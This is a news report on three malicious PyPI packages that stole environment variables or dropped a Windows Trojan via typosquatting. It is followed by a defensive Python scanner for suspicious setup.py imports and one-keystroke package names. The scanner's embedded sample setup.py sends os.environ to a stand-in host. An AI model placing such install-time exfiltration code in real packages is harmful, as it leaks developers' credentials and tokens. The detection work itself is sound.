Three malicious libraries found in the PyPI Python package directory

Three libraries containing malicious code have been identified in the PyPI (Python Package Index) directory. Before the problems were identified and the packages removed from the directory, they had been downloaded about 15 thousand times.

The packages dpp-client (10194 downloads) and dpp-client1234 (1536 downloads) had been distributed since February and included code that sends the contents of environment variables, which can, for example, include access keys, tokens or passwords for continuous integration systems or cloud environments such as AWS, to an external host. The packages also sent a listing of the contents of the "/home", "/mnt/mesos/" and "mnt/mesos/sandbox" directories to the external host.

The aws-login0tool package (3042 downloads) was published to the PyPI repository on December 1 and included code to download and run a Trojan application that takes control of hosts running Windows. The package name was chosen on the calculation that the "0" and "-" keys are adjacent on the keyboard, so a developer may well type "aws-login0tool" instead of "aws-login-tool".

The problematic packages were identified in a simple experiment: a portion of the PyPI packages (about 200 thousand of the 330 thousand packages in the repository) was downloaded with the Bandersnatch utility, after which the grep utility was used to find and inspect the packages whose setup.py file mentions the call "import urllib.request", which is typically used to send requests to external hosts.
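As an added example (not code from the article or from the researchers who ran the experiment), the two checks the article describes, generalised: an ast-based scan of a setup.py for install-time network imports and os.environ reads, which catches the same thing as the grep for "import urllib.request" but also the "from urllib import request" form, and a one-keystroke distance check that flags names such as aws-login0tool against a list of known package names. The sample setup.py and the example.invalid host are constructed for the example.

```python
import ast

# Constructed sample setup.py in the style the article describes: a network
# import at install time plus a read of the whole environment.
SAMPLE_SETUP_PY = '''
import os
import urllib.request
data = str(dict(os.environ)).encode()
urllib.request.urlopen("http://example.invalid/collect", data=data)
'''

NETWORK_MODULES = {"urllib.request", "requests", "socket", "http.client"}

def suspicious_setup_imports(source: str) -> list:
    """Findings for one setup.py: network-capable imports and os.environ reads."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return ["unparseable setup.py (possibly obfuscated)"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.name in NETWORK_MODULES or a.name.startswith("urllib"):
                    findings.append(f"import {a.name}")
        elif isinstance(node, ast.ImportFrom):
            mod = node.module or ""
            for a in node.names:
                if mod in NETWORK_MODULES or f"{mod}.{a.name}" in NETWORK_MODULES:
                    findings.append(f"from {mod} import {a.name}")
        elif (isinstance(node, ast.Attribute) and node.attr == "environ"
              and isinstance(node.value, ast.Name) and node.value.id == "os"):
            findings.append("os.environ access")
    return findings

def is_one_edit_away(a: str, b: str) -> bool:
    """One substitution, insertion/deletion or adjacent swap apart (a typo distance)."""
    if len(a) == len(b):
        d = [i for i, (x, y) in enumerate(zip(a, b)) if x != y]
        return len(d) == 1 or (len(d) == 2 and d[1] == d[0] + 1
                               and a[d[0]] == b[d[1]] and a[d[1]] == b[d[0]])
    if abs(len(a) - len(b)) != 1:
        return False
    short, long_ = sorted((a, b), key=len)
    return any(long_[:i] + long_[i + 1:] == short for i in range(len(long_)))

def typosquat_candidates(name: str, known: list) -> list:
    """Known package names that the given name is one keystroke away from."""
    return [k for k in known if is_one_edit_away(name, k)]
```

Running suspicious_setup_imports over every setup.py in a Bandersnatch mirror gives a review queue rather than a verdict; legitimate packages also fetch things at install time, so each hit still needs a human look.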

source: budenet.ru